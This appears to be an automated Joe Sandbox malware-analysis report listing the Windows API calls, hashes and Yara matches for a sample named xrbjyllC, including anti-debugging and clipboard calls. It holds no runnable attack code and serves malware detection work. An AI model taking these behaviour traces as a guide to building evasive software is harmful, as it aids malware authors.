                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 275ebecea4e09af61022e0b649836a4d3f1c69e081591467dcb506dd8f7f2d59
                                                                                              • Instruction ID: eb3776bc65f31b6ec7af061aa2d529159c14ab171b8352f54c046f3a189d88bd
                                                                                              • Opcode Fuzzy Hash: 275ebecea4e09af61022e0b649836a4d3f1c69e081591467dcb506dd8f7f2d59
                                                                                              • Instruction Fuzzy Hash: 9251CEB1D10209DFDB14CFA9C990ADEBBB1FF48350F20852AE819AB220D7709981CF91
                                                                                              APIs
                                                                                              • CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 2DB81A62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CreateWindow
                                                                                              • String ID:
                                                                                              • API String ID: 716092398-0
                                                                                              • Opcode ID: 9563ea881886c29dce15194e2c788f77d2d70c7b2b2bfe52306956ca49eea286
                                                                                              • Instruction ID: 95663e17d4d4cf32acf57df63524b8fd5767dfb46319ecfba477750ad616e73a
                                                                                              • Opcode Fuzzy Hash: 9563ea881886c29dce15194e2c788f77d2d70c7b2b2bfe52306956ca49eea286
                                                                                              • Instruction Fuzzy Hash: 0341BEB1D113099FDB14CFA9C990ADEBBB5FF48350F20852AE819AB221D7709981CF91
                                                                                              APIs
                                                                                              • CallWindowProcW.USER32(?,?,?,?,?), ref: 2DB867A9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: CallProcWindow
                                                                                              • String ID:
                                                                                              • API String ID: 2714655100-0
                                                                                              • Opcode ID: c19890655f6a9780d60ea5de19190ea808a10c092099d7fc19b82024712c761d
                                                                                              • Instruction ID: bcf989a10a19a46d58d31c5257614c0e58bf44e44842fac5a3622fe38acf94c9
                                                                                              • Opcode Fuzzy Hash: c19890655f6a9780d60ea5de19190ea808a10c092099d7fc19b82024712c761d
                                                                                              • Instruction Fuzzy Hash: F4411BB9900285CFCB04CF59C494A9AFBF5FB88314F24C459E519AB321D734A941CFA1
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: 0d18ad52791c6909d22d7f627165147af1e0c20db8a962971b24992943af98d6
                                                                                              • Instruction ID: b3cd0baa465da97ac9accc449a8a32dccc43ff19c0daa728f9af543af3531a0a
                                                                                              • Opcode Fuzzy Hash: 0d18ad52791c6909d22d7f627165147af1e0c20db8a962971b24992943af98d6
                                                                                              • Instruction Fuzzy Hash: D4310FB0E01249DFDB14CFA8CA94BDDBBF1EF08308F248059E404BB6A5D7749985CB61
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID: Clipboard
                                                                                              • String ID:
                                                                                              • API String ID: 220874293-0
                                                                                              • Opcode ID: 955ceae21cd82dba875c06ad8fd980457ebc967f5298a9556b7babb9952118b5
                                                                                              • Instruction ID: 758070053e9c452ab2407728df62fcb6bd026edc2a00f25ec2c9f0f0c6898e27
                                                                                              • Opcode Fuzzy Hash: 955ceae21cd82dba875c06ad8fd980457ebc967f5298a9556b7babb9952118b5
                                                                                              • Instruction Fuzzy Hash: 683100B0901209DFDB14CF99C994BCEBBF5EB48308F248019E404BB2A4D774A985CBA5
                                                                                              APIs
                                                                                              • DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 2DB858DF
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1892082144.000000002DB80000.00000040.00000800.00020000.00000000.sdmp, Offset: 2DB80000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_2db80000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27dbd000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 021c8d7180bca40b1b4a0da321e6e5f783d7625571517dbbd39f1422581fcb41
                                                                                              • Instruction ID: 3845b217b4515694663a33cbd01b666bc6298620f7a7d2ef8c8e3194bd8f72ac
                                                                                              • Opcode Fuzzy Hash: 021c8d7180bca40b1b4a0da321e6e5f783d7625571517dbbd39f1422581fcb41
                                                                                              • Instruction Fuzzy Hash: B6118B75504284DFDB11CF14D5C4B15FBA1FB84314F24C6AEDC4A4B656C33AD44ACB62
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884420939.0000000027DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 27DAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27dad000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: ebd5963d2dbea0553f357632ef604e37fdd14bdbdcf94b4d5c5d89c7b57b8afe
                                                                                              • Instruction ID: 666303be060f9a7da177805bc059fd5950fdb99fd330285d05a1b20561edb690
                                                                                              • Opcode Fuzzy Hash: ebd5963d2dbea0553f357632ef604e37fdd14bdbdcf94b4d5c5d89c7b57b8afe
                                                                                              • Instruction Fuzzy Hash: AB014C7140D3C09FD7024B268C94752BFB8EF53224F1985DBE9889F1A7C6695C49CBB2
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1884420939.0000000027DAD000.00000040.00000800.00020000.00000000.sdmp, Offset: 27DAD000, based on PE: false
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_27dad000_xrbjyllC.jbxd
                                                                                              Similarity
                                                                                              • API ID:
                                                                                              • String ID:
                                                                                              • API String ID:
                                                                                              • Opcode ID: 33525c4e6d925ab2181681711c1b44f6b433a4fd450f06f4faa8ef168f09fe3d
                                                                                              • Instruction ID: 43dad9e0fb041da2589ac4ae41cacedb6b30055ea7c6fe5fb0381f3caad78222
                                                                                              • Opcode Fuzzy Hash: 33525c4e6d925ab2181681711c1b44f6b433a4fd450f06f4faa8ef168f09fe3d
                                                                                              • Instruction Fuzzy Hash: B001F271008340DAE3108B26C984B57FFDCFF41324F18C53EED882A28ACA799841CAB5
                                                                                              APIs
                                                                                              • IsDebuggerPresent.KERNEL32 ref: 004136F4
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00413709
                                                                                              • UnhandledExceptionFilter.KERNEL32(0041FB80), ref: 00413714
                                                                                              • GetCurrentProcess.KERNEL32(C0000409), ref: 00413730
                                                                                              • TerminateProcess.KERNEL32(00000000), ref: 00413737
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterProcessUnhandled$CurrentDebuggerPresentTerminate
                                                                                              • String ID:
                                                                                              • API String ID: 2579439406-0
                                                                                              • Opcode ID: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                              • Instruction ID: 93bf0ba95bc2a0faef8203f21c221f33afe887fd41373e09ae0fa508b254143b
                                                                                              • Opcode Fuzzy Hash: 8d1f5aed7c5dfd20079dd4d946f02ab3c4db913f1b194ab0176bc05653236347
                                                                                              • Instruction Fuzzy Hash: A521C3B4601204EFD720DF65E94A6457FB4FB08356F80407AE50887772E7B86682CF4D
                                                                                              APIs
                                                                                              • GetProcessHeap.KERNEL32 ref: 0040ADD0
                                                                                              • HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0040ADE1
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: Heap$FreeProcess
                                                                                              • String ID:
                                                                                              • API String ID: 3859560861-0
                                                                                              • Opcode ID: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                              • Instruction ID: 72dd180cd7110ee49b406fd12918c6a771032a3efea8c67e715e4993f3fed615
                                                                                              • Opcode Fuzzy Hash: 97be969a41baf58eb72298c462d2c401217e5b830f10c891868ac5f2a1a85b43
                                                                                              • Instruction Fuzzy Hash: 54E09A312003009FC320AB61DC08FA337AAEF88311F04C829E55A936A0DB78EC42CB58
                                                                                              APIs
                                                                                              • SetUnhandledExceptionFilter.KERNEL32(Function_000123AF), ref: 004123F6
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000002.1859312320.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000426000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000002.1859312320.0000000000445000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_2_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: ExceptionFilterUnhandled
                                                                                              • String ID:
                                                                                              • API String ID: 3192549508-0
                                                                                              • Opcode ID: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                              • Instruction ID: 17be93bd3878235df00445469c4c747c8dbd7a907b9f456768254b9c32cbcc1b
                                                                                              • Opcode Fuzzy Hash: 4924e8eeaf860e2c76ee0bfea96ab0c911441afc8f12962253436aa9ca0899ee
                                                                                              • Instruction Fuzzy Hash: CA900270661144D7865017705D0968669949B4C6427618471653DD4098DBAA40505569
                                                                                              APIs
                                                                                              • LCMapStringW.KERNEL32(00000000,00000100,00420398,00000001,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004170B3
                                                                                              • GetLastError.KERNEL32(?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000,?,7FFFFFFF,00000000,00000000,?,27DC18F8), ref: 004170C5
                                                                                              • MultiByteToWideChar.KERNEL32(7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 00417151
                                                                                              • _malloc.LIBCMT ref: 0041718A
                                                                                              • MultiByteToWideChar.KERNEL32(?,00000001,?,?,?,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171BD
                                                                                              • LCMapStringW.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,7FFFFFFF,00000000,?,?,00000000,00000000,7FFFFFFF,00000000), ref: 004171D9
                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,?,?), ref: 00417213
                                                                                              • _malloc.LIBCMT ref: 0041724C
                                                                                              • LCMapStringW.KERNEL32(?,00000400,00000400,00000000,00000000,?), ref: 00417277
                                                                                              • WideCharToMultiByte.KERNEL32(?,00000000,00000000,?,?,?,00000000,00000000), ref: 0041729A
                                                                                              • __freea.LIBCMT ref: 004172A4
                                                                                              • __freea.LIBCMT ref: 004172AD
                                                                                              • ___ansicp.LIBCMT ref: 004172DE
                                                                                              • ___convertcp.LIBCMT ref: 00417309
                                                                                              • LCMapStringA.KERNEL32(?,?,00000000,?,00000000,00000000,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?), ref: 0041732A
                                                                                              • _malloc.LIBCMT ref: 00417362
                                                                                              • _memset.LIBCMT ref: 00417384
                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,00000000,?,?,?,?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,?), ref: 0041739C
                                                                                              • ___convertcp.LIBCMT ref: 004173BA
                                                                                              • __freea.LIBCMT ref: 004173CF
                                                                                              • LCMapStringA.KERNEL32(?,?,?,?,7FFFFFFF,00000100,7FFFFFFF,00000100,7FFFFFFF,?,?,?,?,7FFFFFFF,?,00000000), ref: 004173E9
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: String$ByteCharMultiWide__freea_malloc$___convertcp$ErrorLast___ansicp_memset
                                                                                              • String ID:
                                                                                              • API String ID: 3809854901-0
                                                                                              • Opcode ID: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                              • Instruction ID: cdfffc9a1d2b3026f9ae82d5cc8d175594050d3ba9b5f3d3ede674b9b5b9b85c
                                                                                              • Opcode Fuzzy Hash: 3d09e5343aa18fab3ca4e2e74db44cf1cccdb49efdd84c094ede33f31d65ba6e
                                                                                              • Instruction Fuzzy Hash: 29B1B072908119EFCF119FA0CC808EF7BB5EF48354B14856BF915A2260D7398DD2DB98
                                                                                              APIs
                                                                                              • _malloc.LIBCMT ref: 004057DE
                                                                                                • Part of subcall function 0040B84D: __FF_MSGBANNER.LIBCMT ref: 0040B870
                                                                                                • Part of subcall function 0040B84D: __NMSG_WRITE.LIBCMT ref: 0040B877
                                                                                                • Part of subcall function 0040B84D: RtlAllocateHeap.NTDLL(00000000,-0000000E,00000001,00000000,00000000,?,00411C86,00000001,00000001,00000001,?,0040D66A,00000018,00421240,0000000C,0040D6FB), ref: 0040B8C4
                                                                                              • _malloc.LIBCMT ref: 00405842
                                                                                              • _malloc.LIBCMT ref: 00405906
                                                                                              • _malloc.LIBCMT ref: 00405930
                                                                                              Strings
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _malloc$AllocateHeap
                                                                                              • String ID: 1.2.3
                                                                                              • API String ID: 680241177-2310465506
                                                                                              • Opcode ID: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                              • Instruction ID: 6f54ea0e5a0cddcbb7a6eab5c61130b8c10e9e343dc86a4c4a61a5a67c51a18e
                                                                                              • Opcode Fuzzy Hash: 1371ffb49ce3b8dee1113081a69af0fad64233f45308895947edc3c59a7df708
                                                                                              • Instruction Fuzzy Hash: 8B61F7B1944B408FD720AF2A888066BBBE0FB45314F548D3FE5D5A3781D739D8498F5A
                                                                                              APIs
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: _memset$__filbuf__fileno__getptd_noexit__read_memcpy_s
                                                                                              • String ID:
                                                                                              • API String ID: 3886058894-0
                                                                                              • Opcode ID: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                              • Instruction ID: 0234425abcb0213f77efd30778ac7634d7a408156a07f93f58cd91f86a00e979
                                                                                              • Opcode Fuzzy Hash: bd76f0579c09bb0a6f952e3feb4c94488d7cfab1bd6474dd60967b9cc6db7677
                                                                                              • Instruction Fuzzy Hash: 1E519031A00605ABCB209F69C844A9FBB75EF41324F24863BF825B22D1D7799E51CBDD
                                                                                              APIs
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 004017EE
                                                                                                • Part of subcall function 00401030: RaiseException.KERNEL32(-0000000113D97C15,00000001,00000000,00000000,00000015,2C2D8410), ref: 0040101C
                                                                                                • Part of subcall function 00401030: GetLastError.KERNEL32 ref: 00401030
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 00401800
                                                                                              • EntryPoint.XRBJYLLC(80070057), ref: 00401813
                                                                                              • __recalloc.LIBCMT ref: 00401828
                                                                                              • EntryPoint.XRBJYLLC(8007000E), ref: 00401839
                                                                                              • EntryPoint.XRBJYLLC(8007000E), ref: 00401853
                                                                                              • _calloc.LIBCMT ref: 00401861
                                                                                              Memory Dump Source
                                                                                              • Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              • Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmpDownload File
                                                                                              Joe Sandbox IDA Plugin
                                                                                              • Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
                                                                                              Yara matches
                                                                                              Similarity
                                                                                              • API ID: EntryPoint$ErrorExceptionLastRaise__recalloc_calloc
                                                                                              • String ID:
                                                                                              • API String ID: 1721462702-0
                                                                                              • Opcode ID: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                              • Instruction ID: 9b44c07ae4757e317c030d83b628f3e382e80143504443e1f3b2735d650bea0f
                                                                                              • Opcode Fuzzy Hash: a5ad3cd8a15542cfcc4b59831b28fc936e8548016bd987b06b7189672beebcc8
                                                                                              • Instruction Fuzzy Hash: AC018872500241EACA21BA229C06F1B7294DF90799F24893FF4C5762E2D63D9990D6EE

APIs
• __getptd.LIBCMT ref: 00414744
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __getptd.LIBCMT ref: 0041475B
• __amsg_exit.LIBCMT ref: 00414769
• __lock.LIBCMT ref: 00414779
Memory Dump Source
• Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
• API ID: __amsg_exit__getptd$__getptd_noexit__lock
• String ID: @.B
• API String ID: 3521780317-470711618
• Opcode ID: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction ID: 91aff3cf2d6bbea4e2ea5d49e8e08bf0f41c3eb50374f8394f27d7b6c467aa53
• Opcode Fuzzy Hash: f43c5434038c0e2b3130a40ea1e7b9b854db78837d0c16722a3a572f716d4dbb
• Instruction Fuzzy Hash: 60F09631A407009BE720BB66850678D73A06F81719F91456FE4646B2D1CB7C6981CA5D

APIs
• __lock_file.LIBCMT ref: 0040C6C8
• __fileno.LIBCMT ref: 0040C6D6
• __fileno.LIBCMT ref: 0040C6E2
• __fileno.LIBCMT ref: 0040C6EE
• __fileno.LIBCMT ref: 0040C6FE
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
• API ID: __fileno$__decode_pointer__getptd_noexit__lock_file
• String ID:
• API String ID: 2805327698-0
• Opcode ID: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
• Instruction ID: db056c5abb1484b678344f3d998e50672bc49cccd6cfe868de5707b4f3f6250f
• Opcode Fuzzy Hash: 0562b983a982954f07d72bd2f01eb344b0d1ff129a9d588568d63b7b4b77f5f9
• Instruction Fuzzy Hash: 1A01253231451096C261ABBE5CC246E76A0DE81734726877FF024BB1D2DB3C99429E9D

APIs
• __getptd.LIBCMT ref: 00413FD8
  • Part of subcall function 00410735: __getptd_noexit.LIBCMT ref: 00410738
  • Part of subcall function 00410735: __amsg_exit.LIBCMT ref: 00410745
• __amsg_exit.LIBCMT ref: 00413FF8
• __lock.LIBCMT ref: 00414008
• InterlockedDecrement.KERNEL32(?), ref: 00414025
• InterlockedIncrement.KERNEL32(27DC1698), ref: 00414050
Memory Dump Source
• Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
• API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock
• String ID:
• API String ID: 4271482742-0
• Opcode ID: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction ID: 77fb08d543caf33888dccec20a3998fa005b1348dfeb798e4aa279577202aa48
• Opcode Fuzzy Hash: 75ed1ba79165a940210d4fbe753a496d3ed1b888d754918a7527295a16311c61
• Instruction Fuzzy Hash: 9301A531A01621ABD724AF67990579E7B60AF48764F50442BE814B72D0C77C6DC2CBDD

APIs
• GetModuleHandleA.KERNEL32(KERNEL32,0040CDF5), ref: 00413615
• GetProcAddress.KERNEL32(00000000,IsProcessorFeaturePresent), ref: 00413625
Memory Dump Source
• Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
• API ID: AddressHandleModuleProc
• String ID: IsProcessorFeaturePresent$KERNEL32
• API String ID: 1646373207-3105848591
• Opcode ID: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
• Instruction ID: 3bb3582238f4ecb0ba7b9e8fe578e45fdcf0af3c55e5dfe2a5e3893bc0ad87fb
• Opcode Fuzzy Hash: 118b5162a474c003ae69c9300a13838c9d8123de4a3b48a289e819fb4020d245
• Instruction Fuzzy Hash: 96F06230600A09E2DB105FA1ED1E2EFBB74BB80746F5101A19196B0194DF38D0B6825A

APIs
• __fileno.LIBCMT ref: 0040C77C
• __locking.LIBCMT ref: 0040C791
  • Part of subcall function 0040BFC1: __getptd_noexit.LIBCMT ref: 0040BFC1
  • Part of subcall function 0040E744: __decode_pointer.LIBCMT ref: 0040E74F
Memory Dump Source
• Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
• API ID: __decode_pointer__fileno__getptd_noexit__locking
• String ID:
• API String ID: 2395185920-0
• Opcode ID: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
• Instruction ID: 30055f4621fb528cea72007990449f1feb1a7f288d573051c200dc5e1a244c20
• Opcode Fuzzy Hash: 0afeae9b27a86c2abe0b3397de8921379debd9150d07dd18b85413c6fc1de43d
• Instruction Fuzzy Hash: CC51CF72E00209EBDB10AF69C9C0B59BBA1AF01355F14C27AD915B73D1D378AE41DB8D

Memory Dump Source
• Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
• API ID: _fseek_malloc_memset
• String ID:
• API String ID: 208892515-0
• Opcode ID: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
• Instruction ID: b5a371ba5f9a3ad1fa090fb1a89082137fe8d6c03bc5c52cd66242ccf2a60741
• Opcode Fuzzy Hash: 6f84d9cc9673cc99cf3f73f605a11d8361332ed7cabd46e1548c12b7ae2e097d
• Instruction Fuzzy Hash: 3541A572600F018AD630972EE804B2772E5DF90364F140A3FE9E6E27D5E738E9458F89

APIs
• _LocaleUpdate::_LocaleUpdate.LIBCMT ref: 004152D3
• __isleadbyte_l.LIBCMT ref: 00415307
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,?,?,00000000,?,?,?), ref: 00415338
• MultiByteToWideChar.KERNEL32(00000080,00000009,00000083,00000001,?,00000000,?,?,?), ref: 004153A6
Memory Dump Source
• Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
• API ID: ByteCharLocaleMultiWide$UpdateUpdate::___isleadbyte_l
• String ID:
• API String ID: 3058430110-0
• Opcode ID: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction ID: 094900ada7e667e90e346a2540d450e67f5821ec0926a3c2ae07879bc245b0d1
• Opcode Fuzzy Hash: 2839bf6a935194de417e4e3b9e78947074703b487fc663d1488f120054b34ef5
• Instruction Fuzzy Hash: 1831A032A00649EFDB20DFA4C8809EE7BB5EF41350B1885AAE8659B291D374DD80DF59

Memory Dump Source
• Source File: 00000009.00000001.1719718721.0000000000400000.00000040.00000001.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
• Associated: 00000009.00000001.1719718721.0000000000426000.00000040.00000001.00020000.00000000.sdmp
• Associated: 00000009.00000001.1719718721.0000000000445000.00000040.00000001.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_9_1_400000_xrbjyllC.jbxd
• API ID: __cftoe_l__cftof_l__cftog_l__fltout2
• String ID:
• API String ID: 3016257755-0
• Opcode ID: bfaf9c04f800815b6471d517da42daec28121d5ec88fca071302ba537a085f53
• Instruction ID: bfd0e68975b3765f24e543ba70b005e9871d43ed2f52156b65e62ceec70126f9
